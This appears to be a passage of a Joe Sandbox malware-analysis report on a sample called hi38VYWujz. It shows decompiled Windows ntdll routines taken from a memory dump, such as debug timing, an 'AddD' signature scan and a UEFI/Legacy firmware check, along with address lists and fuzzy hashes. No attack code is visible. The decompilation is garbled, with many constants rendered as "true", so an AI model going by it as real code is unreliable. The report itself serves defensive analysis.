							_t146 =  *0x7ffe000c;
							_t99 =  *0x7FFE0008;
							if(_t146 ==  *0x7FFE0010) {
								goto L5;
							}
							asm("pause");
						}
						L5:
						_t132 = _v8;
						_t141 = _v16;
						_t74 =  *0x7ffe03b0;
						_t113 =  *((intOrPtr*)(0x7ffe03b4));
						_v24 = _t74;
					} while (_v12 != _t74 || _t141 != _t113);
					_t75 =  *0x36bd67f0; // 0x0
					_t142 =  *0x36bd67f4; // 0x0
					_v16 = _t142;
					_t143 = _v20;
				} while (_t143 != _t75 || _t132 != _v16);
				asm("sbb esi, ecx");
				_t101 = _t99 - _v24 - _t143;
				_t144 = _v28;
				asm("sbb esi, edx");
				L36AF2330(_t144 + 0x90, _t144 + 0x90);
				 *(_t144 + 0xde) = 0;
				if(( *(_t144 + 0xde) & 0x00000004) != 0) {
					 *(_t144 + 0xd8) = 0;
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					 *((intOrPtr*)(_t144 + 0xd0)) = 0;
					E36AF24D0(_t144 + 0x90);
					_t81 = E36BB49D2( *((intOrPtr*)(_t144 + 0xd0)));
					L20:
					_t82 = _t81 | 0xffffffff;
					asm("lock xadd [edi], eax");
					if(_t82 == 0) {
						 *0x36bd91e0(_t144);
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 4))))))();
					}
					return _t82;
				}
				if( *((intOrPtr*)(_t144 + 0xdd)) != 0) {
					 *((intOrPtr*)(_t144 + 0xc8)) = 0;
					 *((intOrPtr*)(_t144 + 0xcc)) = 0;
					if(E36B1CC67() != 0) {
						goto L18;
					}
					goto L19;
				} else {
					_t133 =  *(_t144 + 0xd8);
					if(_t133 != 0) {
						if(_a4 != 0) {
							_t119 = _t101;
							_v8 = _t146;
						} else {
							_t119 =  *((intOrPtr*)(_t144 + 0xc8));
							_v8 =  *((intOrPtr*)(_t144 + 0xcc));
						}
						_t89 = _t133;
						_t135 = _t89 * 0x2710 >> 0x20;
						_t90 = _t89 * 0x2710;
						_t120 = _t119 + _t90;
						_v12 = _t90;
						_t91 = _v8;
						asm("adc eax, edx");
						_v24 = 0x2710;
						_v28 = _t120;
						_v8 = _t91;
						 *((intOrPtr*)(_t144 + 0xc8)) = _t120;
						 *((intOrPtr*)(_t144 + 0xcc)) = _t91;
						_t160 = _t91 - _t146;
						if(_t160 <= 0 && (_t160 < 0 || _t120 <= _t101)) {
							asm("sbb eax, [ebp-0x4]");
							_t97 = E36B26540(_t101 - _v28, _t146, _v12, _t135);
							_t91 = _v24;
							asm("sbb eax, edx");
							 *((intOrPtr*)(_t144 + 0xc8)) = _v12 - _t97 + _t101;
							asm("adc eax, esi");
							 *((intOrPtr*)(_t144 + 0xcc)) = _v24;
						}
						asm("lock inc dword [edi]");
						_t102 = _v32;
						L36AF2330(_t91, _v32);
						E36AE79D1(_v32 + 0x50, _t144);
						E36AE77F9(_t102 + 0x50, 0);
						E36AF24D0(_t102);
					}
					L18:
					E36AF1BE7(_t144);
					L19:
					_t81 = E36AF24D0(_t144 + 0x90);
					goto L20;
				}
			}

0x36ae762e
0x36ae7630
0x36ae7632
0x36ae7635
0x36ae763f
0x36b4171a
0x36ae7645
0x36ae7645
0x36ae7645
0x36ae764d
0x36b41737
0x36b41737
0x00000000
0x36ae7653
0x36ae7653
0x36ae7653
0x36ae7653
0x36ae765d
0x36ae7663
0x36ae7666
0x36ae7673
0x36ae7676
0x36ae767f
0x36ae767f
0x36ae7681
0x36ae7687
0x00000000
0x00000000
0x36ae77f2
0x36ae77f2
0x36ae768d
0x36ae768d
0x36ae7695
0x36ae7698
0x36ae769a
0x36ae769d
0x36ae76a0
0x36ae76a9
0x36ae76ae
0x36ae76b4
0x36ae76b7
0x36ae76ba
0x36ae76c6
0x36ae76c8
0x36ae76ca
0x36ae76cd
0x36ae76d6
0x36ae76e3
0x36ae76eb
0x36b4174e
0x36b41754
0x36b4175a
0x36b41760
0x36b41766
0x36b4176d
0x36ae778a
0x36ae778a
0x36ae778d
0x36ae7791
0x36b4177f
0x00000000
0x36b41785
0x36ae779b
0x36ae779b
0x36ae76f7
0x36ae77cf
0x36ae77d5
0x36ae77e4
0x00000000
0x00000000
0x00000000
0x36ae76fd
0x36ae76fd
0x36ae7705
0x36ae770a
0x36ae77e8
0x36ae77ea
0x36ae7710
0x36ae7716
0x36ae771c
0x36ae771c
0x36ae771f
0x36ae7726
0x36ae7726
0x36ae7728
0x36ae772a
0x36ae772d
0x36ae7730
0x36ae7732
0x36ae7735
0x36ae7738
0x36ae773b
0x36ae7741
0x36ae7747
0x36ae7749
0x36ae77a9
0x36ae77ae
0x36ae77b8
0x36ae77bb
0x36ae77bf
0x36ae77c5
0x36ae77c7
0x36ae77c7
0x36ae7751
0x36ae7754
0x36ae7758
0x36ae7762
0x36ae776c
0x36ae7772
0x36ae7772
0x36ae7777
0x36ae7779
0x36ae777e
0x36ae7785
0x00000000
0x36ae7785

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61499f21fa7fde3ed963c05af84669fa559f51aec7a7ef1719fe59c4a21a9a07
Instruction ID: 06c7bae095a6fd857703633547fd9d9f92c9e3c68a29fd5df102e430ae0cceec
Opcode Fuzzy Hash: 61499f21fa7fde3ed963c05af84669fa559f51aec7a7ef1719fe59c4a21a9a07
Instruction Fuzzy Hash: 61617075E00616AFDB08DF68C984A9DFBB5FF48345F25816AD819AB300DB34A941CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 36AE5622 Relevance: 3.1, APIs: 2, Instructions: 104
timeCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E36AE5622(signed int __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ebx;
				void* _t32;
				void* _t33;
				intOrPtr* _t36;
				char* _t52;
				intOrPtr _t55;
				void* _t72;
				signed int _t78;

				_push(__ecx);
				_t72 = __edx;
				_t75 = __ecx;
				if(_a4 == 0x102) {
					_t32 = E36AE7072(__ecx, __edx, 0);
					if(_t32 != 0) {
						L3:
						_t33 = E36AF3C40();
						_t52 = 0x7ffe0386;
						if(_t33 != 0) {
							_t36 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t36 = 0x7ffe0386;
						}
						if( *_t36 != 0) {
							E36BB4C59( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						E36AE6F4C( &_v8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						 *((intOrPtr*)(_t75 + 0x30)) =  *((intOrPtr*)(_t72 + 0x30));
						 *((intOrPtr*)(_t75 + 0x34)) =  *((intOrPtr*)(_t72 + 0x34));
						 *0x36bd91e0(_t75,  *((intOrPtr*)(_t72 + 0x34)), _t72, _a4);
						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 0x30))))();
						if(E36AF3C40() != 0) {
							_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						}
						if( *_t52 != 0) {
							E36BB4CD2( *((intOrPtr*)(_t72 + 0x5c)), _t72 + 0xf8,  *((intOrPtr*)(_t72 + 0x30)),  *((intOrPtr*)(_t72 + 0x34)),  *((intOrPtr*)(_t72 + 0x3c)));
						}
						_t32 = E36AE6ECF(_v8);
						L9:
						return _t32;
					}
					goto L9;
				}
				_t55 =  *((intOrPtr*)(__edx + 0x58));
				if(_t55 != 0) {
					if(E36B02120(_t55, __ecx, 0, _t55) >= 0) {
						 *(__ecx + 0x50) =  *(__ecx + 0x50) | 0x00000100;
						 *((intOrPtr*)(__ecx + 0x64)) = _t55;
						goto L2;
					}
					_t78 = __ecx | 0xffffffff;
					_t32 = E36B0DB40(_t72 + 0x20, _t78, 0);
					asm("lock xadd [edi], esi");
					if(_t78 == 1) {
						 *0x36bd91e0(_t72);
						_t32 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + 4))))))();
					}
					goto L9;
				}
				L2:
				E36AE7007(_t75, _t72);
				goto L3;
			}

0x36ae5627
0x36ae5632
0x36ae5634
0x36ae5636
0x36ae56c7
0x36ae56ce
0x36ae5650
0x36ae5650
0x36ae5655
0x36ae565c
0x36b40642
0x36ae5662
0x36ae5662
0x36ae5662
0x36ae5668
0x36b4065e
0x36b4065e
0x36ae567a
0x36ae5685
0x36ae568c
0x36ae5698
0x36ae569e
0x36ae56a7
0x36b40671
0x36b40671
0x36ae56b0
0x36b4068e
0x36b4068e
0x36ae56b9
0x36ae56be
0x36ae56c2
0x36ae56c2
0x00000000
0x36ae56d0
0x36ae563c
0x36ae5641
0x36b405f9
0x36b4062a
0x36b40631
0x00000000
0x36b40631
0x36b405fb
0x36b40605
0x36b4060a
0x36b4060f
0x36b4061d
0x36b40623
0x36b40623
0x00000000
0x36b4060f
0x36ae5647
0x36ae564b
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 36AE5698
RtlDebugPrintTimes.NTDLL ref: 36B4061D

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4b3f272c2628a07269fb7cc662aec0a9004eb70ca0b5f812dd5568db07789b18
Instruction ID: 00b9c5b691fc1f46265009f5e9ca8fcfc869208423b1b0893c6a2ace852bcb80
Opcode Fuzzy Hash: 4b3f272c2628a07269fb7cc662aec0a9004eb70ca0b5f812dd5568db07789b18
Instruction Fuzzy Hash: 9D31BE31611B22BFE746AF24CE80E8AFB65FF44758F145125E9018BA50DB71E821DFD1

Uniqueness

Uniqueness Score: -1.00%

Function 36B69567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 36B69598
RtlDebugPrintTimes.NTDLL ref: 36B695D6

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: cecbba3b507fb84b23f9a2e78b416f6417c2d8c355cca41736f2e71b7d1b0172
Instruction ID: 5efcfdb6edee152059d543def36fe7f214d480dff1ddec10802249613e467b7d
Opcode Fuzzy Hash: cecbba3b507fb84b23f9a2e78b416f6417c2d8c355cca41736f2e71b7d1b0172
Instruction Fuzzy Hash: FE112771F00326ABEB04AF59C994A5EF7B9EB48268F200079EA09E7300CA749D00CF94

Uniqueness

Uniqueness Score: -1.00%

Function 36B6174B Relevance: 2.8, Strings: 2, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E36B6174B(void* __ecx) {
				intOrPtr _v12;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				signed int _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v92;
				signed int* _v96;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				char _v112;
				intOrPtr _v120;
				char _v124;
				char _v128;
				intOrPtr _v136;
				char _v140;
				char _v141;
				void* _t108;
				signed int _t109;
				intOrPtr _t115;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr* _t165;
				char _t167;
				void* _t170;
				void* _t171;
				intOrPtr _t174;
				char _t179;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				char _t186;
				void* _t190;
				void* _t192;
				signed int _t194;
				void* _t196;
				signed int _t197;
				signed int _t198;
				void* _t200;
				signed int* _t203;

				_t171 = __ecx;
				_t183 =  *((intOrPtr*)( *[fs:0x30] + 8));
				_t167 = 0;
				_t200 = 0;
				_t194 =  *(__ecx + 6) & 0x0000ffff;
				_t108 = ( *(__ecx + 0x14) & 0x0000ffff) + 0x2c;
				_v141 = 0;
				_v104 = _t183;
				if(_t194 == 0) {
					L7:
					_t109 =  *(_t171 + 0xac);
					if(_t109 == 0) {
						L15:
						_t184 =  *((intOrPtr*)(_t171 + 0x9c));
						if(_t184 != 0) {
							_t162 =  *((intOrPtr*)(_t171 + 0x98)) + _t184;
							if(_t162 > _t200) {
								_t200 = _t162;
							}
						}
						_push(0);
						_push("true");
						_push( &_v52);
						_push(0x25);
						_push(0xffffffff);
						if(E36B22B20() < 0) {
							L44:
							return _t167;
						} else {
							_t22 = _t200 + 0x2000; // 0x2000
							if(_t22 >= _v12) {
								goto L44;
							}
							_t115 =  *0x36bd5b24; // 0x68b2ce0
							_t25 = _t115 + 0x28; // 0x68b1cd8
							if(E36B01BA0(_t171,  *_t25,  &_v84, 0, 0) == 0) {
								goto L44;
							}
							_v72 = _v72 & 0x00000000;
							_v60 = _v60 & 0x00000000;
							_v56 = _v56 & 0x00000000;
							_push("true");
							_v68 =  &_v84;
							_push(5);
							_push( &_v92);
							_v76 = 0x18;
							_push( &_v76);
							_push(0x100001);
							_v64 = 0x40;
							_push( &_v128);
							if(E36B22CE0() < 0) {
								L43:
								E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v80);
								goto L44;
							}
							_push(0);
							_v136 = 0;
							_v140 = _v12 + 0xfffffffc;
							_push( &_v140);
							_push("true");
							_pop(_t196);
							_push(_t196);
							_push( &_v112);
							_push( &_v92);
							_push(0);
							_push(0);
							_push(0);
							_push(_v128);
							if(E36B229F0() < 0) {
								L42:
								_push(_v128);
								E36B22A80();
								goto L43;
							}
							_t185 = _v112;
							_t174 = _v12;
							if(_t185 < _t196 || _t185 + 4 > _t174) {
								L32:
								if(_t185 + 0xc > _t174) {
									goto L42;
								}
								_v140 = _t174 - _t185 - 0xc;
								_push(0);
								_push( &_v140);
								_push("true");
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E36B229F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									goto L38;
								}
								_t179 = _v124;
								_t78 = _t179 + 4; // 0x103
								if(_t78 > _v12) {
									goto L42;
								}
								_v140 = _t179;
								_push(0);
								_push( &_v140);
								_push(_t196);
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E36B229F0() < 0 || _v124 != 0x44646441) {
									goto L42;
								} else {
									goto L38;
								}
							} else {
								_push(0);
								_v140 = _t185 - 4;
								_push( &_v140);
								_push("true");
								_v136 = 0;
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E36B229F0() < 0) {
									goto L42;
								}
								if(_v120 == 0x44646441) {
									L38:
									_t167 = 1;
									_v108 = _v108 & 0x00000000;
									_t203 = E36AEA86F(_v104);
									if(_t203 != 0 &&  *_t203 >= 0x48) {
										_v96 = _t203;
										_v108 =  *_t203;
										_push( &_v100);
										_push(_t196);
										_push( &_v108);
										_push( &_v96);
										_push(0xffffffff);
										if(E36B22EB0() >= 0) {
											_t203[0x10] = _t203[0x10] & 0x00000000;
											_t203[0x11] = _t203[0x11] & 0x00000000;
											_push( &_v100);
											_push(_v100);
											_push( &_v108);
											_push( &_v96);
											_push(0xffffffff);
											E36B22EB0();
										}
									}
									goto L42;
								}
								_t186 = _v124;
								_t174 = _v12;
								_t59 = _t186 + 4; // 0x103
								if(_t59 > _t174) {
									L31:
									_t185 = _v112;
									goto L32;
								}
								_v140 = _t186;
								_push(0);
								_v136 = 0;
								_push( &_v140);
								_push(_t196);
								_push( &_v124);
								_push( &_v92);
								_push(0);
								_push(0);
								_push(0);
								_push(_v128);
								if(E36B229F0() < 0) {
									goto L42;
								}
								if(_v124 == 0x44646441) {
									goto L38;
								}
								_t174 = _v12;
								goto L31;
							}
						}
					}
					_t170 =  *((intOrPtr*)(_t171 + 0xa8)) + _t183;
					_push("true");
					_pop(_t197);
					_t198 = _t109 / _t197;
					if(_t198 == 0) {
						L14:
						_t167 = _v141;
						goto L15;
					}
					_t164 = _t170 + 0x18;
					do {
						if( *((intOrPtr*)(_t164 - 8)) != 0) {
							_t190 =  *_t164 +  *((intOrPtr*)(_t164 - 8));
							if(_t190 > _t200) {
								_t200 = _t190;
							}
						}
						_t164 = _t164 + 0x1c;
						_t198 = _t198 - 1;
					} while (_t198 != 0);
					goto L14;
				} else {
					_t165 = _t108 + __ecx;
					do {
						if( *((intOrPtr*)(_t165 - 4)) != 0) {
							_t192 =  *_t165 +  *((intOrPtr*)(_t165 - 4));
							if(_t192 > _t200) {
								_t200 = _t192;
							}
						}
						_t165 = _t165 + 0x28;
						_t194 = _t194 - 1;
					} while (_t194 != 0);
					_t183 = _v104;
					goto L7;
				}
			}

0x36b6174b
0x36b61762
0x36b61765
0x36b6176b
0x36b6176d
0x36b61771
0x36b61774
0x36b61778
0x36b6177e
0x36b6179f
0x36b6179f
0x36b617a7
0x36b617de
0x36b617de
0x36b617e6
0x36b617ee
0x36b617f2
0x36b617f4
0x36b617f4
0x36b617f2
0x36b617f6
0x36b617f8
0x36b617fe
0x36b617ff
0x36b61801
0x36b6180a
0x36b61a8a
0x36b61a92
0x36b61810
0x36b61810
0x36b6181d
0x00000000
0x00000000
0x36b6182c
0x36b61831
0x36b6183b
0x00000000
0x00000000
0x36b61841
0x36b6184a
0x36b6184f
0x36b61854
0x36b61856
0x36b6185e
0x36b61860
0x36b61865
0x36b6186d
0x36b6186e
0x36b61877
0x36b6187f
0x36b61887
0x36b61a75
0x36b61a85
0x00000000
0x36b61a85
0x36b61896
0x36b6189a
0x36b6189e
0x36b618a6
0x36b618a7
0x36b618a9
0x36b618aa
0x36b618af
0x36b618b4
0x36b618b5
0x36b618b6
0x36b618b7
0x36b618b8
0x36b618c3
0x36b61a6c
0x36b61a6c
0x36b61a70
0x00000000
0x36b61a70
0x36b618c9
0x36b618d2
0x36b618db
0x36b6197f
0x36b61984
0x00000000
0x00000000
0x36b61993
0x36b61999
0x36b6199a
0x36b6199b
0x36b619a1
0x36b619a5
0x36b619aa
0x36b619ab
0x36b619ac
0x36b619ad
0x36b619ae
0x36b619b9
0x00000000
0x00000000
0x36b619c3
0x00000000
0x00000000
0x36b619c5
0x36b619c9
0x36b619d3
0x00000000
0x00000000
0x36b619d9
0x36b619e3
0x36b619e4
0x36b619e5
0x36b619ea
0x36b619ee
0x36b619f3
0x36b619f4
0x36b619f5
0x36b619f6
0x36b619f7
0x36b61a02
0x00000000
0x00000000
0x00000000
0x00000000
0x36b618ec
0x36b618f1
0x36b618f2
0x36b618fa
0x36b618fb
0x36b61901
0x36b61905
0x36b6190a
0x36b6190b
0x36b6190c
0x36b6190d
0x36b6190e
0x36b61919
0x00000000
0x00000000
0x36b61923
0x36b61a0a
0x36b61a0e
0x36b61a10
0x36b61a1a
0x36b61a1e
0x36b61a25
0x36b61a2b
0x36b61a33
0x36b61a34
0x36b61a39
0x36b61a3e
0x36b61a3f
0x36b61a48
0x36b61a4a
0x36b61a52
0x36b61a56
0x36b61a57
0x36b61a5f
0x36b61a64
0x36b61a65
0x36b61a67
0x36b61a67
0x36b61a48
0x00000000
0x36b61a1e
0x36b61929
0x36b6192d
0x36b61934
0x36b61939
0x36b6197b
0x36b6197b
0x00000000
0x36b6197b
0x36b6193d
0x36b61941
0x36b61946
0x36b6194a
0x36b6194b
0x36b61950
0x36b61955
0x36b61956
0x36b61957
0x36b61958
0x36b61959
0x36b61964
0x00000000
0x00000000
0x36b6196e
0x00000000
0x00000000
0x36b61974
0x00000000
0x36b61974
0x36b618db
0x36b6180a
0x36b617af
0x36b617b3
0x36b617b5
0x36b617b8
0x36b617bc
0x36b617da
0x36b617da
0x00000000
0x36b617da
0x36b617be
0x36b617c1
0x36b617c5
0x36b617c9
0x36b617ce
0x36b617d0
0x36b617d0
0x36b617ce
0x36b617d2
0x36b617d5
0x36b617d5
0x00000000
0x36b61780
0x36b61780
0x36b61782
0x36b61786
0x36b6178a
0x36b6178f
0x36b61791
0x36b61791
0x36b6178f
0x36b61793
0x36b61796
0x36b61796
0x36b6179b
0x00000000
0x36b6179b

Strings

@, xrefs: 36B61877
AddD, xrefs: 36B618CD

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: d6da9b5927a6a31ca59e98cc0c78638d884cd01860537a3d94a53611592d6b03
Instruction ID: f14d8618f25a83f63bb6e3dcf8aaad64e3694f03a8a34760532bbf1472d38a7c
Opcode Fuzzy Hash: d6da9b5927a6a31ca59e98cc0c78638d884cd01860537a3d94a53611592d6b03
Instruction Fuzzy Hash: 6BA16CB6504344AFD714CF29C845FABBBE9FB84748F504A2EF99486150E770E909CF62

Uniqueness

Uniqueness Score: -1.00%

Function 36B5E372 Relevance: 2.7, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E36B5E372(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t64;
				signed int _t65;
				signed int _t66;
				signed int _t68;
				void* _t69;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t101;
				void* _t106;
				intOrPtr _t108;
				signed int _t109;
				short* _t111;
				signed int _t113;
				intOrPtr _t120;
				signed int* _t122;
				void* _t124;
				signed short* _t126;
				void* _t127;
				void* _t129;

				_push("true");
				_push(0x36bbcbc0);
				E36B37C40(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t127 - 0x80)) = __edx;
				_t122 =  *(_t127 + 0xc);
				 *(_t127 - 0x7c) = _t122;
				 *((char*)(_t127 - 0x65)) = 0;
				 *((intOrPtr*)(_t127 - 0x64)) = 0;
				 *((intOrPtr*)(_t127 - 0x6c)) = 0;
				 *((intOrPtr*)(_t127 - 4)) = 0;
				_t101 = __ecx;
				if(_t101 == 0) {
					 *(_t127 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E36AEFED0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t127 - 0x65)) = 1;
					_t64 =  *(_t127 - 0x90);
					_t102 = _t64[2];
					_t65 =  *_t64 & 0x0000ffff;
					L20:
					_t66 = _t65 >> 1;
					L21:
					_t111 =  *((intOrPtr*)(_t127 - 0x80));
					if(_t111 == 0) {
						L27:
						 *_t122 = _t66 + 1;
						_t68 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t127 - 0x64)) = _t68;
						L29:
						 *((intOrPtr*)(_t127 - 4)) = 0xfffffffe;
						_t69 = E36B5E588(0);
						 *[fs:0x0] =  *((intOrPtr*)(_t127 - 0x10));
						return _t69;
					}
					if(_t66 >=  *((intOrPtr*)(_t127 + 8))) {
						if(_t111 != 0 &&  *((intOrPtr*)(_t127 + 8)) >= 1) {
							 *_t111 = 0;
						}
						goto L27;
					}
					 *_t122 = _t66;
					_t124 = _t66 + _t66;
					E36B288C0(_t111, _t102, _t124);
					 *((short*)(_t124 +  *((intOrPtr*)(_t127 - 0x80)))) = 0;
					_t68 = 0;
					goto L28;
				}
				_t106 = _t101 - 1;
				if(_t106 == 0) {
					_t126 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E36AFAA60("true", _t126, 0x36ab1890, _t127 - 0x74);
					 *((intOrPtr*)(_t127 - 0x64)) = _t74;
					_t102 = _t126[2];
					if(_t74 < 0) {
						_t65 =  *_t126 & 0x0000ffff;
						_t122 =  *(_t127 - 0x7c);
						goto L20;
					}
					_t66 = (( *(_t127 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t122 =  *(_t127 - 0x7c);
					goto L21;
				}
				if(_t106 == 1) {
					_push("true");
					_pop(_t108);
					 *((intOrPtr*)(_t127 - 0x78)) = _t108;
					 *((intOrPtr*)(_t127 - 0x70)) = 0;
					_push(_t127 - 0x70);
					_push(0);
					_push(0);
					_push(_t108);
					_push(_t127 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t127 - 0x64)) = E36B23FC0();
					 *((intOrPtr*)(_t127 - 0x64)) = 0;
					_t120 = E36AF5D90(_t108,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true",  *((intOrPtr*)(_t127 - 0x70)));
					 *((intOrPtr*)(_t127 - 0x6c)) = _t120;
					if(_t120 != 0) {
						_push(_t127 - 0x70);
						_push( *((intOrPtr*)(_t127 - 0x70)));
						_push(_t120);
						_push("true");
						_push(_t127 - 0x78);
						_push(0x6b);
						_t84 = E36B23FC0();
						 *((intOrPtr*)(_t127 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t113 = 0;
						_t109 = 0;
						while(1) {
							 *((intOrPtr*)(_t127 - 0x84)) = _t113;
							 *(_t127 - 0x88) = _t109;
							if(_t109 >= ( *(_t120 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t113 = _t113 + ( *(_t109 * 0x2c + _t120 + 0x21) & 0x000000ff);
							_t109 = _t109 + 1;
						}
						_t88 = E36B5E048(_t109, _t127 - 0x3c, "true", _t127 - 0x8c, 0, 0, L"%u", _t113);
						_t129 = _t129 + 0x1c;
						 *((intOrPtr*)(_t127 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t102 = _t127 - 0x3c;
						_t66 =  *((intOrPtr*)(_t127 - 0x8c)) - _t127 - 0x3c >> 1;
						goto L21;
					}
					_t68 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push("true");
				_push(_t127 - 0x60);
				_push(0x5a);
				_t94 = E36B22D10();
				 *((intOrPtr*)(_t127 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t127 - 0x50)) == 1) {
					_t102 = L"Legacy";
					_push(6);
				} else {
					_t102 = L"UEFI";
					_push("true");
				}
				_pop(_t66);
				goto L21;
			}

0x36b5e372
0x36b5e377
0x36b5e37c
0x36b5e381
0x36b5e384
0x36b5e387
0x36b5e38c
0x36b5e38f
0x36b5e394
0x36b5e397
0x36b5e39a
0x36b5e39c
0x36b5e4f6
0x36b5e505
0x36b5e50a
0x36b5e50e
0x36b5e514
0x36b5e517
0x36b5e51d
0x36b5e51d
0x36b5e51f
0x36b5e51f
0x36b5e524
0x36b5e557
0x36b5e558
0x36b5e55a
0x36b5e55f
0x36b5e55f
0x36b5e562
0x36b5e562
0x36b5e569
0x36b5e571
0x36b5e57d
0x36b5e57d
0x36b5e529
0x36b5e54a
0x36b5e554
0x36b5e554
0x00000000
0x36b5e54a
0x36b5e52b
0x36b5e52d
0x36b5e533
0x36b5e540
0x36b5e544
0x00000000
0x36b5e544
0x36b5e3a2
0x36b5e3a5
0x36b5e4b5
0x36b5e4c4
0x36b5e4c9
0x36b5e4cc
0x36b5e4d4
0x36b5e4e2
0x36b5e4e5
0x00000000
0x36b5e4e5
0x36b5e4dc
0x36b5e4dd
0x00000000
0x36b5e4dd
0x36b5e3ae
0x36b5e3e7
0x36b5e3e9
0x36b5e3ea
0x36b5e3ed
0x36b5e3f3
0x36b5e3f4
0x36b5e3f5
0x36b5e3f6
0x36b5e3fa
0x36b5e3fb
0x36b5e402
0x36b5e405
0x36b5e41b
0x36b5e41d
0x36b5e422
0x36b5e431
0x36b5e432
0x36b5e435
0x36b5e436
0x36b5e43b
0x36b5e43c
0x36b5e43e
0x36b5e443
0x36b5e448
0x00000000
0x00000000
0x36b5e44e
0x36b5e450
0x36b5e452
0x36b5e452
0x36b5e458
0x36b5e464
0x00000000
0x00000000
0x36b5e46e
0x36b5e470
0x36b5e470
0x36b5e488
0x36b5e48d
0x36b5e490
0x36b5e495
0x00000000
0x00000000
0x36b5e49b
0x36b5e4a8
0x00000000
0x36b5e4a8
0x36b5e424
0x00000000
0x36b5e424
0x36b5e3b0
0x36b5e3b1
0x36b5e3b6
0x36b5e3b7
0x36b5e3b9
0x36b5e3be
0x36b5e3c3
0x00000000
0x00000000
0x36b5e3cf
0x36b5e3da
0x36b5e3df
0x36b5e3d1
0x36b5e3d1
0x36b5e3d6
0x36b5e3d6
